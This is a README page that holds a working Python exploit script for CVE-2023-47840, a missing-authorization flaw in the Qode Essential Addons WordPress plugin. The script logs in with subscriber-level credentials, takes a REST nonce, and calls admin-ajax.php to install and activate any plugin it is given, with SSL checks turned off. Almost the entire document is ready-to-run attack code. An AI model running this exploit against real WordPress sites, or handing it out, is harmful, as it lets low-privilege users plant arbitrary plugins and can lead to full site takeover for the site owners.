README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import argparse
import os
#
# Exploit script by @RandomRobbieBF
#
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
# Ignore bad SSL
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def login_and_activate_plugin(siteurl, wp_user, wp_pass,slug):
# Log in
session = requests.Session()
session.verify = False # Ignore SSL verification
login_url = siteurl + '/wp-login.php'
login_response = session.post(login_url, verify=False, data={
'log': wp_user,
'pwd': wp_pass,
'rememberme': 'forever',
'wp-submit': 'Log+In'
})
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
else:
print("Failed to log in.")
exit()
# Get REST API Nonce
print('Getting REST API Nonce!')
nonce_url = siteurl + '/wp-admin/admin-ajax.php?action=rest-nonce'
nonce_response = session.get(nonce_url,cookies=cookies)
rest_nonce = nonce_response.text.strip()
print("Nonce Found: "+rest_nonce+"")
# Install Plugin
print('Installing Plugin!')
paramsPost = {"action":"install_plugin","pluginAction":"install","pluginSlug":slug,"nonce":rest_nonce}
headers = {"Origin":"http://wordpress.lan","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0","Referer":""+siteurl+"","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
install_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False,cookies=cookies)
print("HTTP STATUS: "+str(install_response.status_code)+" Response: "+install_response.text+"")
# Activate Plugin
print('Activate Plugin!')
paramsPost = {"action":"install_plugin","pluginAction":"activate","pluginSlug":slug,"nonce":rest_nonce}
headers = {"Origin":"http://wordpress.lan","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0","Referer":""+siteurl+"","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
activate_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False,cookies=cookies)
print("HTTP STATUS: "+str(activate_response.status_code)+" Response: "+activate_response.text+"")
# Add the vulnerability description as a comment
DESCRIPTION = """
Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Description
CVE-2023-47840 - The Qode Essential Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin() function in all versions up to, and including, 1.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins."""
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('--url', required=True, help='URL of the WordPress site')
parser.add_argument('--username', required=True, help='WordPress username')
parser.add_argument('--password', required=True, help='WordPress password')
parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
args = parser.parse_args()
login_and_activate_plugin(args.url, args.username, args.password,args.slug)